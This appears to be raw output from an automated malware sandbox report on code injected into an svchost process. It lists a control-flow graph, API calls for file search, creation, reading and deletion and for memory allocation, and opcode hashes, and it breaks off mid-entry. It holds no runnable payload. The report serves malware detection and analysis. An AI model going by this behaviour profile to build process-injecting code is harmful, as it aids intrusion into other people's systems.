                                                                        control_flow_graph 27 759eb0-75a1be 28 75a1cf-75a1db 27->28 29 75a1dd-75a1e9 28->29 30 75a1eb-75a1f2 28->30 29->28 32 75a1f9-75a200 30->32 33 75a221-75a232 32->33 34 75a202-75a21f 32->34 35 75a243-75a24d 33->35 34->32 36 75a24f-75a279 35->36 37 75a27b-75a285 35->37 36->35 38 75a296-75a2a0 37->38 40 75a2b6-75a2ba 38->40 41 75a2a2-75a2b4 38->41 42 75a2bc-75a2e6 40->42 43 75a2e8-75a2f1 40->43 41->38 42->40 45 75a2f7-75a301 43->45 46 75a519-75a520 43->46 49 75a312-75a31e 45->49 47 75a552-75a55c 46->47 48 75a522-75a550 46->48 50 75a56d-75a579 47->50 48->46 51 75a331-75a338 49->51 52 75a320-75a32f 49->52 53 75a58f-75a596 50->53 54 75a57b-75a58d 50->54 56 75a362-75a36c 51->56 57 75a33a-75a34c 51->57 52->49 60 75a59c-75a5a6 53->60 61 75a638-75a651 53->61 54->50 58 75a37d-75a389 56->58 62 75a353-75a355 57->62 63 75a34e-75a352 57->63 67 75a3a7-75a3b1 58->67 68 75a38b-75a397 58->68 69 75a5b7-75a5c0 60->69 61->61 66 75a653-75a65a 61->66 64 75a357-75a35d 62->64 65 75a360 62->65 63->62 64->65 65->51 72 75a68c-75a690 66->72 73 75a65c-75a68a 66->73 76 75a3c2-75a3ce 67->76 70 75a3a5 68->70 71 75a399-75a39f 68->71 74 75a5c2-75a5ce 69->74 75 75a5de call 77b220 69->75 70->58 71->70 78 75a692-75a6a9 72->78 79 75a6ab-75a6b5 72->79 73->66 80 75a5d0-75a5d6 74->80 81 75a5dc 74->81 87 75a5e3-75a5e7 75->87 82 75a3e6-75a3f0 76->82 83 75a3d0-75a3d9 76->83 78->72 80->81 90 75a5a8-75a5b1 81->90 85 75a424-75a427 82->85 86 75a3f2-75a411 82->86 88 75a3e4 83->88 89 75a3db-75a3de 83->89 95 75a42d-75a431 85->95 91 75a413-75a41c 86->91 92 75a422 86->92 93 75a610-75a617 87->93 94 75a5e9-75a60e 87->94 88->76 89->88 90->69 91->92 92->82 93->61 97 75a619-75a636 93->97 94->87 98 75a433-75a450 95->98 99 75a452-75a456 95->99 97->93 98->95 100 75a47e-75a48d 99->100 101 75a458-75a47c 99->101 102 75a494-75a49b 100->102 103 75a48f 100->103 101->99 104 75a4cd-75a4e1 102->104 105 75a49d-75a4cb 102->105 103->46 106 75a4f2-75a4fe 104->106 105->102 107 75a514 106->107 108 75a500-75a512 106->108 107->43 108->106
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$ }$!$,$/$1A$:t$;I$;X$@$Az$C$ER$Ex$L2M+$^$aG$n$n$r$v $wz${$~$r$r
                                                                        • API String ID: 0-708521815
                                                                        • Opcode ID: c5ba1dbd592121899dccba2176337473e5855420b846e5851f3d667c1d2858bf
                                                                        • Instruction ID: 71a873e9f4f7f01d0b6b0c9b4aff284cb758206ea948b7436ba8a4e589e043e5
                                                                        • Opcode Fuzzy Hash: c5ba1dbd592121899dccba2176337473e5855420b846e5851f3d667c1d2858bf
                                                                        • Instruction Fuzzy Hash: C522D4B0D05228DBEB24CF44C9987DDBBB2BB44309F1082E9D5497B291C7B95E89CF52
                                                                        Function 0076C660 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0076C744
                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0076C77F
                                                                        • FindClose.KERNELBASE(?), ref: 0076C78A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: a79b9ece9e244eaacd4845b3d18c23b5cd9f47a4c4a4db4bf35e8d07d9255b89
                                                                        • Instruction ID: e0dc312d3d338d04fdae5dbea53c5cc94308475063007d5aad68ec062e17537d
                                                                        • Opcode Fuzzy Hash: a79b9ece9e244eaacd4845b3d18c23b5cd9f47a4c4a4db4bf35e8d07d9255b89
                                                                        • Instruction Fuzzy Hash: F031B271A00248BBDB21EF64CC89FFF777CAB44745F144459BE49A7181DB74AE848BA0
                                                                        Function 00779230 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(?,?,?,000000F6,?,?,?,?,?,?,?), ref: 00779328
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                        • Instruction ID: d93a10c75c55c23aa7b39b491dfa9dd4dc86bd47d62ee2ac25d685fbca42fe5c
                                                                        • Opcode Fuzzy Hash: 943abc6d6a962a54a79e46a8e17846a86339e37f1ea7195e364c9e77f6308ce1
                                                                        • Instruction Fuzzy Hash: 3431CFB5A00248ABCB14DF98D885EEEB7B9EF88304F108219FD18A7240D734A951CBA5
                                                                        Function 00779390 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,?,000000F6,?,?,?,?,?), ref: 00779473
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                        • Instruction ID: 25c5d867f60f7f049123ea2721d82f85be48fe0350f55ee7322f7a4fe00c6bd4
                                                                        • Opcode Fuzzy Hash: b7f1b19bae1833c49a946c7fba1103e696fa9b0267a1a5d0d3544ce55816e37e
                                                                        • Instruction Fuzzy Hash: 2231E7B5A00248ABDB14DF98C881EEFB7B9EF88714F108219FD18A7340D774A951CFA1
                                                                        Function 00779670 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00761DEE,?,0077807F,00000000,00000004,00003000,?,?,?,?,?,0077807F,00761DEE), ref: 00779735
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                        • Instruction ID: 47355bc44af29de68487d05b79ac74169ad7a09c46ffc519bd50b6c95d323346
                                                                        • Opcode Fuzzy Hash: f915eb28ae2039f1a9b4e0d9c0d2c3b02de51cec562ba8e2b1efbf4d73026005
                                                                        • Instruction Fuzzy Hash: 00215CB5A00249AFDB14DF98CC85EEFB7B9EF88304F008209FD18A7240D774A911CBA1
                                                                        Function 00779480 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                        • Instruction ID: 348a5e5d79ff8f1a277c22c2c0d7bef6b74ef3131e21d08b9e81e6ca78d57088
                                                                        • Opcode Fuzzy Hash: ca5fb79d41cc8b6e2c0132a612284b4b438bf8adf110cb35009967c8a8a4f33a
                                                                        • Instruction Fuzzy Hash: A3119175600648BADA20EA58CC45FEF736CDB85715F008249FA186B181DB746905CBA1
                                                                        Function 00779520 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00779551
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_750000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction ID: ab6a8c7ea02aaebf0c12e04df4b7dfab90644d6781d6a545a836bb375c1c6105
                                                                        • Opcode Fuzzy Hash: 193f3562c9ccceffbf2ab8c981e63ac041f9aa8d1b0f16e9b97175512fe5262a
                                                                        • Instruction Fuzzy Hash: E1E08C3A210204BBD620FB59CC45FEB77ACEFC5769F408419FA08A7242C670B90587F0
                                                                        Function 03474340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                                        • Instruction ID: 72c92bbcb24c92b6a2295692ef5c4e4972709a11658c111f7618beda93aab60a
                                                                        • Opcode Fuzzy Hash: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                                        • Instruction Fuzzy Hash: 4D900231605804129140B25848C458A4006D7F0301B95C012E0424958C8B148A565365
                                                                        Function 03474650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                                        • Instruction ID: 09a6dc104a7221763c81892134439d020f2e9f20716e62529d814148475769c9
                                                                        • Opcode Fuzzy Hash: dc00c96bad191c4697036bd28f6d791f7d8457f265c58a44dc25d1c8497a6615
                                                                        • Instruction Fuzzy Hash: 84900261601504424140B258484444A6006D7F13013D5C116A0554964C87188955926D
                                                                        Function 034735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                                        • Instruction ID: 4bca997d960333c53abf703bb35b18ff92955c10a8950eac8f555f58a6710de8
                                                                        • Opcode Fuzzy Hash: b9825105942e779f8b352d68d82bda0f9eae152e97186c4aee66648c490b0f21
                                                                        • Instruction Fuzzy Hash: 2690023160550802D100B258455474A1006C7E0301FA5C412A042496CD87958A5165A6
                                                                        Function 03472B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                                        • Instruction ID: 7696a08e5a0c48e97cb664b4b09091bd128144885373470c9bf44bae4d9bad19
                                                                        • Opcode Fuzzy Hash: 95e15aa7820ea37cae0e72f35633bf8c4abfdef1cd67152372a387abca9edb48
                                                                        • Instruction Fuzzy Hash: 86900261202404034105B258445465A400BC7F0301B95C022E1014994DC72589916129
                                                                        Function 03472BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                                        • Instruction ID: 5cb4092ec6905c91303e444233e23db69c8a7823047fe6b16d9bf8a262b4ba3a
                                                                        • Opcode Fuzzy Hash: 56c43f02746c319b28b8f694ab1669c35885a25df32d35be58ac5247bd37f954
                                                                        • Instruction Fuzzy Hash: 7F90023120544C42D140B2584444A8A0016C7E0305F95C012A0064A98D97258E55B665
                                                                        Function 03472BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                                        • Instruction ID: bfb556593fc9188f6595328e0eef3940e6ea9b95108cc597480273b1cd83c652
                                                                        • Opcode Fuzzy Hash: ae6dae04a31183f797cd141bcc70c21eabe959961fb1413dbc5ba4a2e4001053
                                                                        • Instruction Fuzzy Hash: 0F90023120140C02D180B258444468E0006C7E1301FD5C016A0025A58DCB158B5977A5
                                                                        Function 03472BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                                        • Instruction ID: 11c38fe69be812629be4a4c4d52382f0f1785cab8268b41d6f3e95fd67f10d3c
                                                                        • Opcode Fuzzy Hash: 205dda8ca7947066e8c048ef7efef9781cf025ac443f82423534e85e4cf55a9c
                                                                        • Instruction Fuzzy Hash: 9290023160540C02D150B258445478A0006C7E0301F95C012A0024A58D87558B5576A5
                                                                        Function 03472AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                                        • Instruction ID: 69daad7016237f5548ded85334c572891d3c2dbd83542f723c1ab4b59bccc68d
                                                                        • Opcode Fuzzy Hash: 22f7de448098a9f4c48f2a682c8f1ef755fbcfaa47434f822ea38d34894acd90
                                                                        • Instruction Fuzzy Hash: EA900435311404030105F75C074454F0047C7F53513D5C033F1015D54CD731CD715135
                                                                        Function 03472AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                                        • Instruction ID: 3439920f6f3c2e2ce0ef6eb975adae44e9dbe64eb16bc2de4f4d596b8514799e
                                                                        • Opcode Fuzzy Hash: eafd9c12e4bcd058fc169bb57aef2e9dbbebacc96cadbc8138ce139f17d9f337
                                                                        • Instruction Fuzzy Hash: 37900225221404020145F658064454F0446D7E63513D5C016F1416994CC72189655325
                                                                        Function 034739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                                        • Instruction ID: 47cdf6eec6ed39feeeb7053ae7b290b7846c0bf0ef8dc50b8db8d3e1c38d803e
                                                                        • Opcode Fuzzy Hash: 185f9c956e42f43e7be4556c48d3a137fda8d4e4f601cb687d0473a206269c4a
                                                                        • Instruction Fuzzy Hash: B490022124545502D150B25C444465A4006E7F0301F95C022A0814998D875589556225
                                                                        Function 03472F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                                        • Instruction ID: c14d874ccc1f0c1e00700b0332997a2ac578efca10b798a98b9ae6454404502b
                                                                        • Opcode Fuzzy Hash: a6c46bb0a739b6535eca5193581950f4bb4144fe7aed55b0fd806c8cb6a62006
                                                                        • Instruction Fuzzy Hash: F090026134140842D100B2584454B4A0006C7F1301F95C016E1064958D8719CD52612A
                                                                        Function 03472FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                                        • Instruction ID: 8578209f691f6f6d3f36360c5e96c9e92a940fe244bfb2d04a34e426fd988201
                                                                        • Opcode Fuzzy Hash: 658390109daa7272b6d252a106a63f1ec800042c1589717b036c1192c10602ac
                                                                        • Instruction Fuzzy Hash: 6B900221211C0442D200B6684C54B4B0006C7E0303F95C116A0154958CCB1589615525
                                                                        Function 03472FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                                        • Instruction ID: 1b8e297135e053990b57d6a5726b469420328d6dd36b46e306be3dfe52296c16
                                                                        • Opcode Fuzzy Hash: c5893831817649cb1e1e44d0510f1dc0d2af392abf5f640d6a28f0f95e01da98
                                                                        • Instruction Fuzzy Hash: 97900221601404424140B268888494A4006EBF1311795C122A0998954D875989655669
                                                                        Function 03472EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                                        • Instruction ID: dfe9b4d20b83632294945e48237db2af787c42e5f342c93c6f8b94d8409d2823
                                                                        • Opcode Fuzzy Hash: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                                        • Instruction Fuzzy Hash: DF90026120180803D140B658484464B0006C7E0302F95C012A2064959E8B298D516139
                                                                        Function 03472E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
